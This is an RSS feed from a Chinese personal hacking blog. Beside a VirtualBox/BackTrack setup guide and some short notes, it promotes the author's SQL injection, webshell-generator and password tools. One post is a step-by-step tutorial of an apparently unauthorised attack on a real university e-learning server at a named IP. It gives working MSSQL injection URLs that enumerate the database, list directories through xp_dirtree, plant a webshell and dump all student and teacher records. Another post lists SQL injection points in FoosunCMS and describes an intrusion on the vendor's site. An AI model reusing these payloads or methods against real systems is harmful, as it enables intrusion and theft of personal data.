<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[许云风's BLOG]]></title>
<link>http://www.xuyunfeng.com.cn/</link>
<description><![CDATA[在大多数人关注你飞的高不高的时候,很少有人去关注你飞的累不累！]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[xuyunfeng@xuyunfeng.com.cn(许云风)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>许云风&#39;s BLOG</title>
	<url>http://www.xuyunfeng.com.cn/images/logos.gif</url>
	<link>http://www.xuyunfeng.com.cn/</link>
	<description>许云风&#39;s BLOG</description>
</image>

			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=205</link>
			<title><![CDATA[ubuntu利用virtualbox安装backtrack]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Tue,25 Jan 2011 12:21:20 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=205</guid>
		<description><![CDATA[笔记本一直安装ubuntu系统,虽然比较适用,但很多渗透工具不全,也不想折腾,就安装backtrack虚拟机.<br/>一.主机:ubunt系统<br/>二:虚拟机backtrack<br/>安装过程不用多说:<br/>1:联网<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=1" border="0" alt=""/><br/>默认联网方式为NAT,backtrack默认情况下没启动eth0,开机启动:ifup eth0<br/>桥接方式上网:先设置virtualbox为桥接方式<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=2" border="0" alt=""/><br/>进入BACKTRACK，编辑 vi /etc/network/interfaces根据实际情况填写<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=3" border="0" alt=""/><br/>设置DNS vi /etc/resolv.conf<br/>重启网络即可上网<br/>/etc/init.d/networking restart<br/>2. 安装virtualbox增强工具<br/>关闭backtrack<br/>在virtualbox中添加光驱并加载增强工具:VBoxGuestAdditions.iso<br/>路径为:/usr/share/virtualbox/VBoxGuestAdditions.iso<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=4" border="0" alt=""/><br/>启动backtrack<br/>挂加光驱<br/>在运行Ubuntu的virtualbox菜单里选择“设备”-“安装增强功能”<br/>mkdir /mnt/cdrom<br/>mount /dev/cdrom3 /mnt/cdrom<br/>挂载成功<br/>cd /mnt/cdrom<br/>./VBoxLinuxAdditions.run<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=5" border="0" alt=""/><br/>安装成功.重启即可<br/>3：设置共享空间<br/>关闭backtrack<br/>在virtualbox中不能直接访问宿主机的数据,需要设置共享空间<br/>设置需要共享的数据<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=6" border="0" alt=""/><br/>我需要共享的位置为:/home/xuyunfeng<br/>数据空间的名字为:xuyunfeng<br/>注意不要选择“只读”<br/>启动backtrack<br/>dir /sbin/mount.*，确认/sbin/mount.vboxsf存在<br/>.lsmod | grep vboxvfs，查看boxvfs模块是否加载<br/>mount -t vboxsf 数据空间的名字 在BACKTRACK中的建立的共享文件目录<br/>数据空间的名字:xuyunfeng<br/>运行mkdir /root/share<br/>在BACKTRACK中的建立的共享文件目录：/root/share<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=7" border="0" alt=""/><br/>共享空间安装成功,但是重启后又需要再次加载<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=8" border="0" alt=""/><br/>设置自动加载<br/>在/etc/fstab中最后添加一行<br/>xuyunfeng&nbsp;&nbsp; /root/share&nbsp;&nbsp;&nbsp;&nbsp;vboxsf&nbsp;&nbsp;&nbsp;&nbsp;rw&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;0<br/><img src="http://www.xuyunfeng.com.cn/download.asp?id=9" border="0" alt=""/><br/>保存重启即可。<br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=204</link>
			<title><![CDATA[重开博客]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[我的日志]]></category>
			<pubDate>Sat,15 Jan 2011 03:10:32 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=204</guid>
		<description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;博客两年多没更新了,连密码都忘了,直到空间到期,才知道，以后有时间还是改写写！]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=203</link>
			<title><![CDATA[关于博客说明]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[我的日志]]></category>
			<pubDate>Sun,15 Jun 2008 16:19:32 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=203</guid>
		<description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="font-size:14pt;line-height:100%;"><span style="color:Red">&nbsp;&nbsp; 对不起朋友们,最近因为工作原因不能更新博客,有的朋友说软件不能下载,<br/>可以在网上搜索一下嘛!<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 可能明年才有时间来管理博客了! </span></span>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=202</link>
			<title><![CDATA[感谢中国知音的建议]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[我的日志]]></category>
			<pubDate>Sun,04 May 2008 16:51:21 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=202</guid>
		<description><![CDATA[今天知音给我说了MSSQL Injection Tools V 1.0的一些不足之处,写的很详细,很感谢他的建议,<br/>下次改软件的时候,一定改进!!<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0805/u200854165119.jpg" border="0" alt=""/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=201</link>
			<title><![CDATA[黑鹰VIP专用WebShell生成器]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[我的作品]]></category>
			<pubDate>Fri,25 Apr 2008 06:01:15 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=201</guid>
		<description><![CDATA[以前很多黑鹰的朋友问我工具怎么还没发出去,现在已经发出去了,你们可以去下了！<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/320084256041.jpg" border="0" alt=""/><br/><br/><a href="http://dx.3800hk.com/vipdown/vipdown/v09/200804/22706.html" target="_blank" rel="external">http://dx.3800hk.com/vipdown/vipdown/v09/200804/22706.html</a>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=199</link>
			<title><![CDATA[MSSQL Injection Tools V 1.0]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[我的作品]]></category>
			<pubDate>Mon,21 Apr 2008 00:42:11 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=199</guid>
		<description><![CDATA[<img src="http://www.xuyunfeng.com.cn/attachments/month_0804/m200842104113.jpg" border="0" alt=""/><br/><div id="mdown_nbvun4fqnb"></div><br /><script language="javascript" type="text/javascript">doAjax('?action=type1&mainurl=attachments%2Fmonth%5F0804%2Fm200842174948%2Erar&main=%E7%82%B9%E5%87%BB%E4%B8%8B%E8%BD%BD%E6%AD%A4%E6%96%87%E4%BB%B6','mdown_nbvun4fqnb');</script><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=198</link>
			<title><![CDATA[拿电子科大网络学堂手工注入(新手篇)]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Fri,18 Apr 2008 23:07:48 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=198</guid>
		<description><![CDATA[很多朋友都说我拿站就只有图,现在写一个简单的过程!<br/>没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上&#39;<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/1.jpg" border="0" alt=""/><br/>有防注入系统,限制了我的IP,现在就可以用COOKIES注入器<br/>进入注入:<br/><br/><img src="http://www.xuyunfeng.com.cn/tupian/2.jpg" border="0" alt=""/><br/>填写相应信息,生成1.asp,放到我服务器上次,地址是:<a target="_blank" href="http://www.xuyunfeng.com.cn/1.asp" rel="external">http://www.xuyunfeng.com.cn/1.asp</a><br/>加上参数为:<a target="_blank" href="http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048" rel="external">http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048</a><br/>现在尝试注入;<a target="_blank" href="http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048&#39;" rel="external">http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/3.jpg" border="0" alt=""/><br/>提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a>一:暴数据库信息:<br/>1.判断数据库名:<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;%20and%20db_name()&gt;0%20and%20&#39;&#39;=&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/4.jpg" border="0" alt=""/><br/>暴出数据库名为:wlxt<br/>2.判断数据库用户名:<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;%20and%20user&gt;0%20and%20&#39;&#39;=&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/5.jpg" border="0" alt=""/><br/>数据库名为:wlxt136<br/>3.判断数据库权限:<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20and%20&#39;&#39;=&#39;</a><br/><a target="_blank" href="http://www.xuyunfeng.com.cn/tupian/5.jpg" rel="external"><img src="http://www.xuyunfeng.com.cn/tupian/6.jpg" border="0" alt=""/></a><br/>暴出用户权限是:DB的,DB权限可以列目录，现在我们来列网站目录<br/>二:列网站目录<br/>1.创建表:xuyunfeng列C盘的文件和目录<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;;Dro&#112;%20TABLE%20xuyufeng;Cr&#101;ate%20TABLE%20xuyunfeng(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Ins&#101;rt%20xuyunfeng%20exec%20master..xp_dirtree%20&#34;C:\&#34;,%201,1--<br/><img src="http://www.xuyunfeng.com.cn/tupian/7.jpg" border="0" alt=""/><br/>提示防注入系统,不用管它,创建表成功<br/>2:暴出C盘的文件和目录个数<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20xuyunfeng)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/8.jpg" border="0" alt=""/><br/>暴出一共有13个目录和文件<br/>3.列出第一个文件和目录(目录前面有0)<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Sel&#101;ct%20Top%201%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/9.jpg" border="0" alt=""/><br/>第一个目录为:ASFRoot<br/>4:列出第二个文件或目录:<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Sel&#101;ct%20Top%202%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/10.jpg" border="0" alt=""/><br/>第二个目录名为:Config.Msi<br/>5.列第三个文件或目录名:<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Sel&#101;ct%20Top%203%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/11.jpg" border="0" alt=""/><br/>第三个目录为:Documents and Settings<br/>依次这样列出C盘的所有目录和文件,依次可以列所网站的所有目录和文件,从而找到网站<br/>我已经找到了:d:\webroot\wlxt\现在拿到数据库的信息和网站目录,现在可以通过数据库备份<br/>写上一句话木马:<br/>三:上传木马:<br/>1.用到工具,DB备份工具<br/><img src="http://www.xuyunfeng.com.cn/tupian/12.jpg" border="0" alt=""/><br/>把得到的信息写到软件里,依次点击备份,不要管提示,我们看是否成功!<br/><a target="_blank" href="http://www.xuyunfeng.com.cn/ok.asp" rel="external"><img src="http://www.xuyunfeng.com.cn/tupian/13.jpg" border="0" alt=""/></a><br/>备份成功了，现在用一个免杀大马<br/><img src="http://www.xuyunfeng.com.cn/tupian/14.jpg" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/tupian/15.jpg" border="0" alt=""/><br/>点&#34;给我冲进去&#34;看是否成功!<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt</a><a target="_blank" href="http://www.xuyunfeng.com.cn/help.asp" rel="external">/help.asp</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/16.jpg" border="0" alt=""/><br/>成功了,输入密码进入!<br/><img src="http://www.xuyunfeng.com.cn/tupian/17.jpg" border="0" alt=""/><br/>我们成功拿到webshell,结束了这次检测!<br/><img src="http://www.xuyunfeng.com.cn/tupian/18.jpg" border="0" alt=""/><br/>我用工具拿到了整个数据库:包括所有学生和所有老师的信息,上面是所有老师的信息,但我们不能触犯法律,只是起技术的研究,有些并不是完全相同,好就到这了!<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=196</link>
			<title><![CDATA[云风SQL连接器]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[我的作品]]></category>
			<pubDate>Sun,13 Apr 2008 10:05:12 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=196</guid>
		<description><![CDATA[<img src="http://www.xuyunfeng.com.cn/attachments/month_0804/f200841310143.jpg" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/q200841310154.jpg" border="0" alt=""/><br/><div id="mdown_euhnvfuei6"></div><br /><script language="javascript" type="text/javascript">doAjax('?action=type1&mainurl=attachments%2Fmonth%5F0804%2F02008414163439%2Erar&main=%E7%82%B9%E5%87%BB%E4%B8%8B%E8%BD%BD%E6%AD%A4%E6%96%87%E4%BB%B6','mdown_euhnvfuei6');</script><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=195</link>
			<title><![CDATA[风讯的产品,你还敢用吗?]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Sun,06 Apr 2008 05:59:44 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=195</guid>
		<description><![CDATA[作者：jannock<br/><br/>今日来分析一下风讯的产品的安全性。<br/>风讯管方最新下载，FoosunCMSv4.0sp5完整版(含模板)。安装后，查看了一下代码，发现多处SQL 注入。不由心地发出一句：这样的产品，你敢用吗？<br/>对于ASP版。 <br/>1、漏洞文件<br/><br/>/User/i_Blog/Public_Save.asp <br/>38行 p_FileName = Request.Form(&#34;FileName&#34;) <br/>53行 set rstf = User_Conn.execute(&#34;sel&#101;ct FileName,FileExtName From FS_ME_Infoilog wh&#101;re UserNumber=&#39;&#34; <br/>s_User.UserNumber&#34;&#39; and FileName=&#39;&#34;&amp;p_FileName&#34;&#39; and FileExtName=&#39;&#34;&amp;P_FileExtName&#34;&#39;&#34;)<br/><br/>变量没有过虑就进入数据库查询<br/>测试方法<br/><a href="http://localhost/User/i_Blog/PublicLog.asp" target="_blank" rel="external">http://localhost/User/i_Blog/PublicLog.asp</a><br/><br/>在文件名那输入 test&#39; 保存后出现<br/><br/>Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) <br/>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 &#39;UserNumber=&#39;290149F916J&#39; and FileName=&#39;test&#39;&#39; and FileExtName=&#39;html&#39;&#39; 中。 <br/><br/>/User/i_Blog/Public_Save.asp, 第 53 行<br/><br/>2、漏洞文件<br/><br/>/user/Reg_Contact.asp<br/><br/>51 p_C_Name = Request.Form(&#34;C_Name&#34;) <br/>85 AddCorpDataTFObj.open &#34;sel&#101;ct C_Name From FS_ME_CorpUser wh&#101;re C_Name = &#39;&#34;&amp; <br/> p_C_Name &#34;&#39;&#34;,User_Conn,1,3<br/><br/>也明显存在sql注入漏洞<br/> <br/><br/>40 p_RealName = Replace(Request.Form(&#34;RealName&#34;),&#34;&#39;&#39;&#34;,&#34;&#34;) <br/>115 AddUserDataTFObj.open &#34;sel&#101;ct UserName,Email From FS_ME_Users wh&#101;re UserName <br/> = &#39;&#34;&amp; p_UserName_1 &#34;&#39;&#34;,User_Conn,1,3<br/><br/><br/>sql注入漏洞<br/> <br/><br/>3、user/Photo_Class.asp <br/>26 rs.open &#34;sel&#101;ct title,id,UserNumber From FS_ME_PhotoClass wh&#101;re <br/> title=&#39;&#34;&amp;trim(Request.Form(&#34;title&#34;))&#34;&#39; and UserNumber=&#39;&#34;&amp;Fs_User.UserNumber&#34;&#39;&#34;,User_Conn,1,3<br/><br/>title 没有过虑就直接进入数据库<br/>测试方法<br/><a href="http://localhost/user/Photo_Class.asp?Action=add" target="_blank" rel="external">http://localhost/user/Photo_Class.asp?Action=add</a><br/> <br/><br/>在相册分类名称那加入SQL注入语句 test&#39; <br/>Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) <br/>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 &#39;title=&#39;test&#39;&#39; and UserNumber=&#39;290149F916J&#39;&#39; 中。 <br/><br/>/user/Photo_Class.asp, 第 26 行<br/><br/>4、Order_Pay.asp<br/> <br/><br/>14 User_Conn.execute(&#34;Del&#101;te From FS_ME_Order wh&#101;re o&#114;derNumber=&#39;&#34;&amp; <br/>equest.QueryString(&#34;OrderNumber&#34;)&#34;&#39; and UserNumber=&#39;&#34;&amp; Fs_User.UserNumber &#34;&#39;&#34;)<br/><br/>o&#114;derNumber 没有过虑<br/>测试方法<br/><a href="http://localhost/User/Order_Pay.asp?action=lock_order" target="_blank" rel="external">http://localhost/User/Order_Pay.asp?action=lock_order</a>&amp;OrderNumber=4&amp;#39;<br/> <br/><br/>Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) <br/>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 &#39;OrderNumber=&#39;4&#39;&#39; and UserNumber=&#39;290149F916J&#39;&#39; 中。 <br/><br/>/User/Order_Pay.asp, 第 14 行<br/><br/>5、OpenCorp.asp<br/> <br/><br/>39 p_C_Name = Request.Form(&#34;C_Name&#34;) <br/>62 AddCorpDataTFObj.open &#34;sel&#101;ct C_Name From FS_ME_CorpUser wh&#101;re <br/> C_Name = &#39;&#34;&amp; p_C_Name &#34;&#39; and usernumber&lt;&gt;&#39;&#34;&amp;session(&#34;fS_usernumber&#34;)&#34;&#39;&#34;,User_Conn,1,3<br/><br/>6、Message_box.asp<br/><br/>29 DelID = request.Form(&#34;MessageID&#34;) <br/>35 User_Conn.execute(&#34;Del&#101;te From FS_ME_Message wh&#101;re MessageId in (&#34;&amp;DelID&#34;) <br/> and M_ReadUserNumber =&#39;&#34;&amp; Fs_User.UserNumber&#34;&#39;&#34;)<br/><br/>随便一看，就SQL注入就那么多。其它的漏洞呢？<br/>一个SQL注入漏洞就能把网站黑掉。晕。。这样的系统还敢用吗？<br/><br/>对于最新的.net 版 风讯dotNETCMS v1.0<br/>随便看了一下，也存在很严重的漏洞<br/>editor\editor\filemanager\connectors\aspx<br/>connector.aspx<br/>upload.aspx<br/>这两个文件都存在上传漏洞。<br/>很容易上传木马<br/><br/>下面是对风讯管方网站的入侵测试<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/120084655848.JPG" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/72008465598.jpg" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/v20084655930.jpg" border="0" alt=""/><br/><br/>不敢用风讯系统了吧？（注：以上只是本人友情测试）<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.xuyunfeng.com.cn/article.asp?id=194</link>
			<title><![CDATA[密码转换工具]]></title>
			<author>xuyunfeng@xuyunfeng.com.cn(许云风)</author>
			<category><![CDATA[我的作品]]></category>
			<pubDate>Sun,06 Apr 2008 05:09:07 +0800</pubDate>
			<guid>http://www.xuyunfeng.com.cn/default.asp?id=194</guid>
		<description><![CDATA[注入时遇到加过密的密码,可以转换!<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/12008465715.jpg" border="0" alt=""/><br/><div id="mdown_udy4t1fmft"></div><br /><script language="javascript" type="text/javascript">doAjax('?action=type1&mainurl=attachments%2Fmonth%5F0804%2Fk2008465848%2Erar&main=%E7%82%B9%E5%87%BB%E4%B8%8B%E8%BD%BD%E6%AD%A4%E6%96%87%E4%BB%B6','mdown_udy4t1fmft');</script><br/>]]></description>
		</item>
		
</channel>
</rss>

